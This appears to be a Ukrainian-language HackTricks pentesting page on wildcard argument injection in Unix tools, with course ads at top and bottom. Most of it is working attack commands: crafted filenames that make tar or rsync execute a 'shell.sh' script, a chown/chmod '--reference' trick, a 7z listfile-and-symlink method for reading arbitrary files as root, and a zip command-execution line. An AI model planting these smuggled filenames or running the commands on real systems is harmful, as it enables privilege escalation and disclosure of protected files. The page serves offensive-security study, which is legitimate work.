Wildcards Spare tricks

Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

chown, chmod

Ви можете вказати, якого власника файлу та дозволи ви хочете скопіювати для решти файлів

touch "--reference=/my/own/path/filename"

Ви можете використати це за допомогою https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (комбінований атака) Додаткова інформація в https://www.exploit-db.com/papers/33930

Tar

Виконання довільних команд:

touch "--checkpoint=1"
touch "--checkpoint-action=exec=sh shell.sh"

Ви можете використати це за допомогою https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (атака tar) Додаткова інформація в https://www.exploit-db.com/papers/33930

Rsync

Виконання довільних команд:

Interesting rsync option from manual:

-e, --rsh=COMMAND           specify the remote shell to use
--rsync-path=PROGRAM    specify the rsync to run on remote machine
touch "-e sh shell.sh"

Ви можете використати це за допомогою https://github.com/localh0t/wildpwn/blob/master/wildpwn.py (атака rsync) Додаткова інформація за посиланням https://www.exploit-db.com/papers/33930

7z

У 7z навіть використовуючи -- перед * (зауважте, що -- означає, що наступний ввід не може бути оброблений як параметри, тому в цьому випадку лише шляхи до файлів) ви можете спричинити довільну помилку для читання файлу, тому якщо команда, подібна до наступної, виконується користувачем root:

7za a /backup/$filename.zip -t7z -snl -p$pass -- *

І ви можете створювати файли в папці, де виконується цей код, ви можете створити файл @root.txt та файл root.txt, який є символічним посиланням на файл, який ви хочете прочитати:

cd /path/to/7z/acting/folder
touch @root.txt
ln -s /file/you/want/to/read root.txt

Потім, коли 7z виконується, він буде розглядати root.txt як файл, що містить список файлів, які він повинен стиснути (це показує наявність @root.txt), і коли 7z читає root.txt, він буде читати /file/you/want/to/read, оскільки вміст цього файлу не є списком файлів, він викине помилку, показуючи вміст.

Додаткова інформація в Write-ups of the box CTF від HackTheBox.

Zip

Виконання довільних команд:

zip name.zip files -T --unzip-command "sh -c whoami"
Вивчайте хакінг AWS від нуля до героя з htARTE (HackTricks AWS Red Team Expert)!

Інші способи підтримки HackTricks:

Last updated